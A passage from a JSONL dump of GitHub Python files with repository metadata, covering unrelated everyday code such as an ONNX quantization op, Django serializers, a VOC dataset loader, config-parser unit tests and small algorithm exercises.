\r\n\r\n\"\"\"\r\n#Sample:\r\nstart = botChat()\r\nprint(\"You can now talk with the chatbot!\\nType exit to stop\")\r\nwhile True:\r\n inp = input(\"\\nInput: \")\r\n if inp.lower() == \"exit\":\r\n break\r\n print(start.chat(inp))\r\n\"\"\"\r\n","repo_name":"JerichoLeg/BankOmatic","sub_path":"BLL/Chatbot.py","file_name":"Chatbot.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38544223925","text":"from collections.abc import Callable, Sequence\nimport functools\nimport inspect\nfrom typing import Any\n\nimport jax\nfrom jax import numpy as jnp\nfrom jaxonnxruntime.core import handler\nfrom jaxonnxruntime.core import onnx_node\nfrom jaxonnxruntime.core import onnx_utils\n\nimport onnx\n\n\n@handler.register_op(\"QuantizeLinear\")\nclass QuantizeLinear(handler.Handler):\n \"\"\"Implementation of the ONNX QuantizeLinear operator.\"\"\"\n\n @classmethod\n def _prepare(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any], onnx_jax_impl: Any\n ):\n sig = inspect.signature(onnx_jax_impl)\n kwparams = [\n param.name\n for param in sig.parameters.values()\n if param.kind == inspect.Parameter.KEYWORD_ONLY\n ]\n for name in kwparams:\n node.attrs_dict[name] = node.attrs.get(name, None)\n\n @classmethod\n def version_10(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any]\n ) -> Callable[..., Any]:\n \"\"\"ONNX version_10 QuantizeLinear op.\"\"\"\n cls._prepare(node, inputs, onnx_quantizelinear)\n return onnx_quantizelinear\n\n @classmethod\n def version_13(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any]\n ) -> Callable[..., Any]:\n \"\"\"ONNX version_13 QuantizeLinear op.\"\"\"\n cls._prepare(node, inputs, onnx_quantizelinear)\n return onnx_quantizelinear\n\n @classmethod\n def version_19(\n cls, node: onnx_node.OnnxNode, inputs: Sequence[Any]\n ) -> Callable[..., Any]:\n \"\"\"ONNX version_19 QuantizeLinear op.\"\"\"\n cls._prepare(node, inputs, onnx_quantizelinear)\n return onnx_quantizelinear\n\n\n@functools.partial(jax.jit, static_argnames=(\"axis\", \"saturate\"))\ndef onnx_quantizelinear(*input_args, axis, saturate):\n \"\"\"https://github.com/onnx/onnx/blob/v1.12.0/docs/Operators.md#QuantizeLinear for more details.\"\"\"\n x, y_scale, zero_point = input_args\n if not axis:\n axis = 1\n if not saturate:\n saturate = True\n\n if len(y_scale.shape) > 1:\n raise RuntimeError(\"Input 2 must be a vector or a number.\")\n if len(y_scale.shape) > 0 and y_scale.size == 1:\n y_scale = y_scale[0]\n if len(y_scale.shape) > 0:\n new_shape = [1 for _ in x.shape]\n new_shape[axis] = len(y_scale)\n x = x / y_scale.reshape(new_shape)\n else:\n x = x / y_scale\n new_shape = x.shape\n\n if zero_point is not None:\n tensor_type = onnx_utils.np_dtype_to_tensor_dtype(zero_point.dtype)\n\n if tensor_type == onnx.TensorProto.UINT8:\n xi = jnp.rint(x).astype(jnp.int32)\n if len(y_scale.shape) > 0:\n xi += zero_point.reshape(new_shape)\n else:\n xi += zero_point\n dtype = onnx_utils.tensor_dtype_to_jnp_dtype(tensor_type)\n return (jnp.clip(xi, 0, 255).astype(dtype),)\n elif tensor_type == onnx.TensorProto.INT8:\n xi = jnp.rint(x).astype(jnp.int32)\n if len(y_scale.shape) > 0:\n xi += zero_point.reshape(new_shape)\n else:\n xi += zero_point\n dtype = onnx_utils.tensor_dtype_to_jnp_dtype(tensor_type)\n return (jnp.clip(xi, -128, 127).astype(dtype),)\n else:\n raise RuntimeError(\n \"Currently QuantizeLinear implementation does not support dtype\"\n f\" {tensor_type}.zero_point.dtype={zero_point.dtype}.\"\n )\n","repo_name":"google/jaxonnxruntime","sub_path":"jaxonnxruntime/onnx_ops/quantizelinear.py","file_name":"quantizelinear.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"27118887392","text":"from rest_framework import serializers\nfrom .models import Diets, Supplement, Task, Profile, ExerciseCategory, Exercise\nfrom django.contrib.auth.models import User\nfrom rest_framework.validators import UniqueValidator\n\n\n# User Serializer\nclass UserSerializer(serializers.ModelSerializer):\n username = serializers.CharField(validators=[UniqueValidator(queryset=User.objects.all())], min_length=1)\n email = serializers.CharField(max_length=300)\n password = serializers.CharField(min_length=8)\n\n def create(self, validated_data):\n user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])\n return user\n\n class Meta:\n model = User\n fields = ('id', 'username', 'password', 'email', 'is_superuser')\n\n\n# Profile Serializer\nclass ProfileSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n user = UserSerializer(read_only=True)\n first_name = serializers.CharField(required=False, allow_blank=True, default='')\n second_name = serializers.CharField(required=False, allow_blank=True, default='')\n task_count = serializers.IntegerField(required=False, default=0)\n overall_body_test = serializers.FloatField(required=False, default=0)\n allergies = serializers.CharField(required=False, allow_blank=True, default='')\n blood_pressure = serializers.CharField(required=False, allow_blank=True, default='')\n\n class Meta:\n model = Profile\n fields = (\n 'id',\n 'user',\n 'first_name',\n 'second_name',\n 'task_count',\n 'overall_body_test',\n 'allergies',\n 'blood_pressure'\n )\n\n\n# Task Serializer\nclass TaskSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField()\n created_at = serializers.DateTimeField(read_only=True)\n status = serializers.CharField()\n created_by = UserSerializer(read_only=True)\n\n class Meta:\n model = Task\n fields = (\n 'id',\n 'name',\n 'created_at',\n 'status',\n 'created_by'\n )\n\n def create(self, validated_data):\n return Task.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.status = validated_data.get('status', instance.status)\n created_by = UserSerializer(read_only=True)\n instance.save()\n return instance\n\n\n# Supplement Serializer\nclass SupplementSerializer(serializers.Serializer):\n id = serializers.IntegerField(read_only=True)\n title = serializers.CharField(required=True)\n description = serializers.CharField(required=False, allow_blank=True, default='')\n\n def create(self, validated_data):\n supplement = Supplement(**validated_data)\n supplement.save()\n return supplement\n\n def update(self, instance, validated_data):\n instance.title = validated_data.get('title', instance.title)\n instance.description = validated_data.get('description', instance.title)\n instance.save()\n return instance\n\n\n# Diet Serializer\nclass DietSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n title = serializers.CharField()\n description = serializers.CharField()\n\n class Meta:\n model = Diets\n fields = (\n 'id',\n 'title',\n 'description'\n )\n\n\n# Exercise Category Serializer\nclass ExerciseCategorySerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n name = serializers.CharField(max_length=255)\n\n class Meta:\n model = ExerciseCategory\n fields = '__all__'\n\n\n# Exercise Serializer\nclass ExerciseSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n title = serializers.CharField(max_length=255)\n photo_link = serializers.CharField(max_length=255)\n equipment_needed = serializers.CharField(max_length=255)\n how_to_do_tips = serializers.CharField(max_length=1500)\n exercise_category = ExerciseCategorySerializer(required=False)\n\n class Meta:\n model = Exercise\n fields = '__all__'\n\n def create(self, validated_data):\n return Exercise.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.title = validated_data.get('title', instance.title)\n instance.photo_link = validated_data.get('photo_link', instance.photo_link)\n instance.equipment_needed = validated_data.get('equipment_needed',instance.equipment_needed)\n instance.how_to_do_tips = validated_data.get('how_to_do_tips', instance.how_to_do_tips)\n instance.save()\n return instance\n","repo_name":"KizatovArman/WebDevProjectEndTerm","sub_path":"WebDevEzTeam/projectenv/backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3138551612","text":"# Script to create a confusion matrix and calculate kappa.\n\nimport csv\nimport os\nimport numpy as np\nfrom sklearn import metrics\nimport skll\nfrom osgeo import gdal\n\nfolder = r'D:\\osgeopy-data\\Utah'\naccuracy_fn = 'accuracy_data.csv'\nmatrix_fn = 'confusion_matrix.csv'\nprediction_fn = r'D:\\osgeopy-data\\Landsat\\Utah\\tree_prediction60.tif'\n\nos.chdir(folder)\n\n# Collect the data needed for the accuracy assessment.\nxys = []\nclasses = []\nwith open(accuracy_fn) as fp:\n reader = csv.reader(fp)\n next(reader)\n for row in reader:\n xys.append([float(n) for n in row[:2]])\n classes.append(int(row[2]))\n\nds = gdal.Open(prediction_fn)\npixel_trans = gdal.Transformer(ds, None, [])\noffset, ok = pixel_trans.TransformPoints(True, xys)\ncols, rows, z = zip(*offset)\n\ndata = ds.GetRasterBand(1).ReadAsArray()\nsample = data[rows, cols]\ndel ds\n\n# Compute kappa.\nprint('Kappa:', skll.kappa(classes, sample))\n\n# Create the confusion matrix.\nlabels = np.unique(np.concatenate((classes, sample)))\nmatrix = metrics.confusion_matrix(classes, sample, labels)\n\n# Add labels to the matrix and save it.\nmatrix = np.insert(matrix, 0, labels, 0)\nmatrix = np.insert(matrix, 0, np.insert(labels, 0, 0), 1)\nnp.savetxt(matrix_fn, matrix, fmt='%1.0f', delimiter=',')\n","repo_name":"cgarrard/osgeopy-code","sub_path":"Chapter12/listing12_4.py","file_name":"listing12_4.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"81"} +{"seq_id":"23242358155","text":"# -*- coding: utf-8 -*-\n\nfrom texttable import Texttable\nfrom reader import Reader\nfrom listaSE import ListaSE\nfrom linear_regresion_params import LinearRegresionParams\n\n\nclass Application(object):\n\n def __init__(self):\n self.reader = Reader()\n self.load_data()\n\n x, y = self.get_list_from_data(self.data1)\n self.test1 = LinearRegresionParams(x, y)\n x, y = self.get_list_from_data(self.data2)\n self.test2 = LinearRegresionParams(x, y)\n x, y = self.get_list_from_data(self.data3)\n self.test3 = LinearRegresionParams(x, y)\n x, y = self.get_list_from_data(self.data4)\n self.test4 = LinearRegresionParams(x, y)\n\n self.test1.expected = [-22.55, 1.7279, 0.9545, 0.9111, 644.429]\n self.test2.expected = [-4.039, 0.1681, 0.9333, 0.8711, 60.858]\n self.test3.expected = [-23.92, 1.43097, 0.9631, 0.9276, 528.4294]\n self.test4.expected = [-4.604, 0.140164, 0.9480, 0.8988, 49.4994]\n\n self.results = [self.test1, self.test2, self.test3, self.test4]\n\n def load_data(self):\n '''Load the data needed to test the application\n\n Loads the four test data to be used for compute linear regression\n params.\n\n '''\n self.data1 = self.reader.read_from_file('test_data1.txt')\n self.data2 = self.reader.read_from_file('test_data2.txt')\n self.data3 = self.reader.read_from_file('test_data3.txt')\n self.data4 = self.reader.read_from_file('test_data4.txt')\n\n def get_list_from_data(self, data):\n '''Return the corresponding listX and listY from the passed data.\n\n '''\n _list_x = ListaSE()\n _list_y = ListaSE()\n for line in data:\n x, y = line.split()\n _list_x.add(float(x))\n _list_y.add(float(y))\n return _list_x, _list_y\n\n def draw_table_result(self):\n '''Print a table with the header and rows passed.\n\n '''\n # Imprimir las dos columnas\n header = [['Test', 'Expeceted Values\\nBeta0 | Beta1 | r | r*r | P',\n 'Actual Values\\nBeta0 | Beta1 | r | r*r | P']]\n rows = []\n\n total = 0\n for num, test in enumerate(self.results):\n header.append(\n ['Test {0}'.format(str(num+1)),\n '{0} | {1} | {2} | {3} | {4}'.format(\n test.expected[0], test.expected[1],\n test.expected[2], test.expected[3],\n test.expected[4]),\n '{0} | {1} | {2} | {3} | {4}'.format(\n test.beta0, test.beta1,\n test.correlation_r, test.correlation_r**2,\n test.improved_prediction)])\n rows.append(['', '', '', '', '', total])\n table = Texttable()\n table.set_deco(Texttable.HEADER | Texttable.VLINES | Texttable.HLINES | Texttable.BORDER)\n table.set_cols_align([\"c\", \"c\", \"c\"])\n table.set_cols_valign([\"m\", \"m\", \"m\"])\n table.add_rows(header)\n print(table.draw() + \"\\n\")\n\n # EndClassDefinition\n\n\nif __name__ == \"__main__\":\n print('Welcome to PSP Program3!')\n app = Application()\n app.draw_table_result()\n","repo_name":"Sergio2409/PSP-Programs","sub_path":"Programa3/Code/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41978173184","text":"from os.path import join\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef read_files(data_dir, index):\n data_file = join(data_dir, 'data.bin')\n label_file = join(data_dir, 'labels.bin')\n crop_size = 81\n data = np.memmap(data_file, dtype=np.uint8, mode='r', shape=(crop_size, crop_size, 3),\n offset=crop_size * crop_size * 3 * index)\n label = np.memmap(label_file, dtype=np.uint8, mode='r', shape=(1,), offset=index)\n plt.imshow(data)\n plt.title(f\"Traffic light\" if label else f\"Not Traffic light\")\n plt.show(block=True)\n\n\ndef main():\n data_dir = \"../../data/dataset/\"\n\n for index in range(0, 4000, 100):\n read_files(join(data_dir, \"train/\"), index)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zalaznik/mobileye-project","sub_path":"detection_phase2/test_data_preparing.py","file_name":"test_data_preparing.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11290454041","text":"#1. 打印功能提示\nprint(\"=\"*50)\nprint(\" 名片管理系统 V0.01\")\nprint(\" 1. 添加一个新的名片\")\nprint(\" 2. 删除一个名片\")\nprint(\" 3. 修改一个名片\")\nprint(\" 4. 查询一个名片\")\nprint(\" 5. 退出系统\")\nprint(\"=\"*50)\n\n# 用来存储名片\nbusinessCard = []\n\nwhile True:\n function = input(\"请选择一个功能\")\n if function.isnumeric():\n function = int(function)\n # 添加一个新的名片\n if function==1:\n person = {}\n person[\"姓名\"] = input(\"请输入姓名:\")\n person[\"年龄\"] = input(\"请输入年龄:\")\n person[\"性别\"] = input(\"请输入性别:\")\n # person = {\"姓名\":name,\"年龄\":age,\"性别\":sex}\n businessCard.append(person)\n print(businessCard)\n #删除一个名片\n elif function==2:\n name = input(\"请要删除的姓名:\")\n name_flag = 0\n\n for temp in businessCard:\n if temp[\"姓名\"] == name:\n print(\"删除名片%s\",temp[\"姓名\"])\n name_flag = 1\n businessCard.remove(temp)\n break\n\n if name_flag==0:\n print(\"没有找到要删除的人\")\n\n #修改一个名片\n elif function==3:\n name = input(\"请要修改的名片姓名:\")\n name_flag = 0\n\n for temp in businessCard:\n if temp[\"姓名\"] == name:\n print(\"名片%s\",temp[\"姓名\"])\n temp[\"姓名\"] = input(\"请输入姓名:\")\n temp[\"年龄\"] = input(\"请输入年龄:\")\n temp[\"性别\"] = input(\"请输入性别:\")\n name_flag = 1\n break\n\n if name_flag==0:\n print(\"没有找到要修改的人\")\n\n #查询一个名片\n elif function==4:\n name = input(\"请要查询的姓名:\")\n name_flag = 0\n\n for temp in businessCard:\n if temp[\"姓名\"] == name:\n print(temp)\n name_flag = 1\n break\n\n if name_flag==0:\n print(\"查无此人\")\n\n # 退出\n elif function==5:\n print(businessCard)\n\n # 提示异常\n else:\n print(\"输入错误请重新输入!\")\n\n\n","repo_name":"DenChyang/pyDemo","sub_path":"py-base/day03/名片管理系统.py","file_name":"名片管理系统.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"75051188423","text":"import os\nimport cv2\nimport numpy as np\nimport mxnet as mx\nfrom .xmlParser import parseFile\n\n\nclass VOCDataset(mx.gluon.data.Dataset):\n \"\"\"\n Wrapper of HICO Dataset in json file.\n \"\"\"\n voc_class_name = ['__background__', 'person', 'bird', 'cat', 'cow', 'dog', \n 'horse', 'sheep', 'aeroplane', 'bicycle', 'boat', \n 'bus', 'car', 'motorbike', 'train', 'bottle', \n 'chair', 'diningtable', 'pottedplant', 'sofa', 'tvmonitor']\n def __init__(self, annotation_dir: str, img_dir: str, dataset_index:str, transform=None, resize_func=None, **kwargs):\n \"\"\"\n Args:\n annotation_dir: a string describing the path of annotation XML files.\n img_dir: a string describing the path of JPEG images.\n dataset_index: filename of a file containing the IDs of all images used to constructing this dataset\n \"\"\"\n super(VOCDataset, self).__init__(**kwargs)\n with open(dataset_index) as f:\n self.dataset_index = [t.strip() for t in f.readlines()]\n self.img_dir = img_dir\n self.annotation_dir = annotation_dir\n self.transform = transform\n self.class_to_id = {}\n self.resize_func = resize_func\n for i, class_name in enumerate(self.voc_class_name):\n self.class_to_id[class_name] = i\n \n def __getitem__(self, idx):\n idx = self.dataset_index[idx]\n img_path = os.path.join(self.img_dir, idx+'.jpg')\n img = cv2.imread(img_path)\n if self.resize_func is not None:\n img, scale = self.resize_func(img)\n else:\n scale = 1\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = np.transpose(img, (2, 0, 1))\n anno_path = os.path.join(self.annotation_dir, idx+'.xml')\n gt = self.convert_gt_into_array(parseFile(anno_path))\n gt[:, 0:4] *= scale\n\n if self.transform is None:\n return img, gt\n else:\n return self.transform(img, gt)\n\n def __len__(self):\n return len(self.dataset_index)\n\n def convert_gt_into_array(self, gt, filter_difficult=True):\n \"\"\"\n Args:\n gt: the ground truth return by parseFile\n filter_difficult: filter out difficult cases or not\n Returns:\n A n * 5 array in the format of [x1, y1, x2, y2, c]\n \"\"\"\n ret = []\n for obj in gt['objects']:\n if filter_difficult and (obj['difficult']==1):\n continue\n new_array = list(obj['bndbox'])\n new_array.append(self.class_to_id[obj['name']])\n ret.append(new_array)\n return np.asarray(ret, dtype=np.float32)\n\n\ndef show_images(data, label, ds:VOCDataset):\n img = np.transpose(data, (1, 2, 0))\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n for item in label:\n cv2.rectangle(img, (int(item[0]), int(item[1])), (int(item[2]), int(item[3])), color=(255, 0, 0), thickness=2)\n cv2.putText(img, ds.voc_class_name[int(item[4])], (int(item[0]), int(item[3])),0, 0.5,(0, 255, 0))\n cv2.imshow(\"Img\", img)\n cv2.waitKey(0)\n","repo_name":"linmx0130/ya_mxdet","sub_path":"VOCDataset/vocDataset.py","file_name":"vocDataset.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"81"} +{"seq_id":"70745201226","text":"from chainercv.datasets import VOCBboxDataset, voc_bbox_label_names\nfrom cv2 import imwrite, rectangle\nimport numpy as np\n\ntrain_dataset = VOCBboxDataset(year='2007', split='train')\nval_dataset = VOCBboxDataset(year='2007', split='val')\ntrainval_dataset = VOCBboxDataset(year='2007', split='trainval')\ntest_dataset = VOCBboxDataset(year='2007', split='test')\n\n\ndef drawRect(img, istorch=True):\n\n i = np.array(img[0])\n if istorch:\n i = np.transpose(i, (1, 2, 0))\n for pos in img[1]:\n [y, x, yy, xx] = pos\n rectangle(i, (x, y), (xx, yy), (255, 0, 0))\n i = i[..., [2, 1, 0]]\n\n return i\n\n\ndef get_label(predict, turth):\n\n predict = np.expand_dims(predict, axis=0)\n turth = np.expand_dims(turth, axis=1)\n max = np.maximum(turth, predict)\n min = np.minimum(turth, predict)\n\n max[..., 2:4] = min[..., 2:4]\n res = max[..., 2:4] - max[..., 0:2]\n\n mask = np.where(res < 0)\n res[[mask[0]], [mask[1]], [mask[2]]] = 0\n IOU = res[..., 0] * res[..., 1]\n # print(IOU)\n turth_area = turth[..., 2:4] - turth[..., 0:2]\n turth_area = turth_area[..., 0] * turth_area[..., 1]\n # print(turth_area)\n # prd_area = predict[..., 2:4] - predict[..., 0:2]\n # prd_area = prd_area[..., 0] * prd_area[..., 1]\n # # print(prd_area)\n total_IOU = IOU / (turth_area)# + prd_area - IOU)\n return total_IOU\n\n\nif __name__ == '__main__':\n\n print(train_dataset.shape)\n","repo_name":"long-username/-","sub_path":"pytorch-experiment/albert/python/RPN/RPN/voc_database.py","file_name":"voc_database.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35023250725","text":"class Directory:\n def __init__(self, parent=None):\n self.size = 0\n self.subDirs = []\n self.parent = parent\n\n # We completely ignore commands all '$ cd' and '$ ls', because the input file\n # is build so that is lists each directory exactly once.\n # Then also the names of directories and file names don't matter\n def makeSubTrees(self, ix: int, lines: list[str]) -> tuple[int, int]:\n \"\"\"\n Returns a tree-like structure that represents the directory hierarchically.\n Each object: (Directory) has a size: (int) and a subDirs: (list[Directory]),\n that represent child nodes in the tree(or sub directories).\n \"\"\"\n while ix < len(lines) and lines[ix][0] != '$':\n if lines[ix][0].isnumeric():\n self.size += int(lines[ix].split(' ')[0])\n else:\n self.subDirs.append(Directory(self))\n ix += 1\n\n dir: Directory\n for dir in self.subDirs:\n ix, size = dir.makeSubTrees(ix+2, lines)\n self.size += size\n\n return ix+1, self.size\n\n def sumDirsSmallerOrEqualThan(self, size: int) -> int:\n sum = 0\n dir: Directory\n for dir in self.subDirs:\n sum += dir.sumDirsSmallerOrEqualThan(size)\n\n if self.size <= size:\n sum += self.size\n\n return sum\n\n # the size to delete must be bigger than lowerThreshold, but still the smallest possible\n def findSmallestDirToDelete(self, currentMinimum: int, lowerThreshold: int) -> int:\n if self.size >= lowerThreshold and self.size < currentMinimum:\n currentMinimum = self.size\n dir: Directory\n for dir in self.subDirs:\n currentMinimum = dir.findSmallestDirToDelete(\n currentMinimum, lowerThreshold)\n\n return currentMinimum\n\n\ndef first(rootDir: Directory, limit: int) -> None:\n sum = rootDir.sumDirsSmallerOrEqualThan(limit)\n print(sum)\n\n\ndef second(rootDir: Directory, maximumDiskSpace: int, requiredSpace: int) -> None:\n # spaceToFree = required - unused\n spaceToFree = requiredSpace - (maximumDiskSpace - rootDir.size)\n sizeOfDirToDelete = rootDir.findSmallestDirToDelete(\n rootDir.size, spaceToFree)\n print(sizeOfDirToDelete)\n\n\nif __name__ == \"__main__\":\n with open('in.txt') as f:\n lines = f.read().splitlines()\n\n # make a hierarchy tree of directories from input\n rootDir = Directory()\n rootDir.makeSubTrees(2, lines)\n\n first(rootDir, 100000)\n second(rootDir, 70000000, 30000000)\n","repo_name":"krasiren/Aoc","sub_path":"2022/days 1-9/day7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11213189086","text":"\"\"\"tests for vak.config.train module\"\"\"\nimport unittest\nimport os\nimport shutil\nimport tempfile\nfrom configparser import ConfigParser\n\nimport vak.config.train\nimport vak.split\n\n\nHERE = os.path.dirname(__file__)\nTEST_DATA_DIR = os.path.join(HERE, '..', '..', 'test_data')\nTEST_CONFIGS_DIR = os.path.join(TEST_DATA_DIR, 'configs')\n\n\nclass TestParseTrainConfig(unittest.TestCase):\n def setUp(self):\n _, self.tmp_train_vds_path = tempfile.mkstemp()\n _, self.tmp_val_vds_path = tempfile.mkstemp()\n self.tmp_root_dir = tempfile.mkdtemp()\n self.tmp_results_dir = tempfile.mkdtemp(dir=self.tmp_root_dir)\n\n self.config_file = os.path.join(TEST_DATA_DIR, 'configs', 'test_train_config.ini')\n self.config_obj = ConfigParser()\n self.config_obj.read(self.config_file)\n self.config_obj['TRAIN']['train_vds_path'] = self.tmp_train_vds_path\n self.config_obj['TRAIN']['val_vds_path'] = self.tmp_val_vds_path\n self.config_obj['TRAIN']['root_results_dir'] = self.tmp_root_dir\n self.config_obj['TRAIN']['results_dir_made_by_main_script'] = self.tmp_results_dir\n\n def tearDown(self):\n os.remove(self.tmp_train_vds_path)\n os.remove(self.tmp_val_vds_path)\n shutil.rmtree(self.tmp_root_dir)\n\n def test_parse_train_config_returns_TrainConfig_instance(self):\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(type(train_config_obj) == vak.config.train.TrainConfig)\n\n def test_no_networks_raises(self):\n self.config_obj.remove_option('TRAIN', 'networks')\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_network_not_installed_raises(self):\n self.config_obj['TRAIN']['networks'] = 'NotInstalledNet, OtherNotInstalledNet'\n with self.assertRaises(TypeError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_no_train_path_raises(self):\n self.config_obj.remove_option('TRAIN', 'train_vds_path')\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_val_data_dict_path_default(self):\n self.config_obj.remove_option('TRAIN', 'val_vds_path')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.val_vds_path is None)\n\n def test_val_step_default(self):\n self.config_obj.remove_option('TRAIN', 'val_step')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.val_step is None)\n\n def test_save_only_single_checkpoint_default(self):\n self.config_obj.remove_option('TRAIN', 'save_only_single_checkpoint_file')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_only_single_checkpoint_file is True)\n\n def test_ckpt_step_default(self):\n self.config_obj.remove_option('TRAIN', 'ckpt_step')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.ckpt_step is None)\n\n def test_patience_default(self):\n self.config_obj.remove_option('TRAIN', 'patience')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.patience is None)\n\n def test_normalize_spectrograms_default(self):\n self.config_obj.remove_option('TRAIN', 'normalize_spectrograms')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.normalize_spectrograms is False)\n\n def test_use_previous_run_default(self):\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.use_train_subsets_from_previous_run is False)\n self.assertTrue(train_config_obj.previous_run_path is None)\n\n def test_use_previous_run_without_path_error(self):\n self.config_obj['TRAIN']['use_train_subsets_from_previous_run'] = 'True'\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_save_transformed_data(self):\n self.config_obj['TRAIN']['save_transformed_data'] = 'True'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is True)\n\n self.config_obj['TRAIN']['save_transformed_data'] = 'Yes'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is True)\n\n self.config_obj['TRAIN']['save_transformed_data'] = 'False'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is False)\n\n self.config_obj['TRAIN']['save_transformed_data'] = 'No'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is False)\n\n def test_save_transformed_data_default(self):\n # test that save_transformed_data is added\n # and set to False, if we don't specify it\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is False)\n\n def test_missing_root_results_dir_raises(self):\n self.config_obj.remove_option('TRAIN', 'root_results_dir')\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_nonexistent_root_results_dir_raises(self):\n self.config_obj['TRAIN']['root_results_dir'] = 'obviously/non/existent/dir'\n with self.assertRaises(NotADirectoryError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_no_results_dir_defaults_to_None(self):\n self.config_obj.remove_option('TRAIN', 'results_dir_made_by_main_script')\n train_config_tup = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_tup.results_dirname is None)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Tubbz-alt/vak","sub_path":"tests/unit_tests/test_config/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"31249261513","text":"class zigZagTraverse:\n def __init__(self, array):\n self.array = array\n\n # Time : O(n) | Space : O(n)\n # where n = num of elements in the array\n def solution1(self):\n rows = len(self.array)\n cols = len(self.array[0])\n n = rows * cols\n row = 0\n col = 0\n result = []\n direction = 'down'\n count = 0\n\n while count < n:\n count += 1\n result.append(self.array[row][col])\n\n if row + 1 < rows and col == 0 and direction == 'down':\n # not the last row AND first column AND direction is down (also the initial cond)\n # then go down \n row += 1\n direction = 'up'\n \n elif row > 0 and col + 1 < cols and direction == 'up':\n # not the first row AND not the last column AND direction is up\n # then go up (diagonally)\n row -= 1\n col += 1\n\n elif row == 0 and col + 1 < cols and direction == 'up':\n # first row AND not the last column AND direction is up\n # then go up (horizontally)\n col += 1\n direction = 'down'\n\n elif col > 0 and row + 1 < rows and direction == 'down':\n # not the first column AND not the last row AND direction is down\n # then go down (diagonally)\n row += 1\n col -= 1\n\n elif row + 1 < rows and col + 1 == cols and direction == 'up':\n # not the last row AND last column AND direction is up\n # then go down (straight)\n row += 1\n direction = 'down'\n\n elif row + 1 == rows and col + 1 < cols and direction == 'down':\n # last row AND not the last column AND direction is down\n # then go up (horizontally)\n col += 1\n direction = 'up'\n\n return result\n\n# --- Testing the solution -\n\narray = [\n [1, 3, 4, 10],\n [2, 5, 9, 11],\n [6, 8, 12, 15],\n [7, 13, 14, 16]\n]\n\nobj = 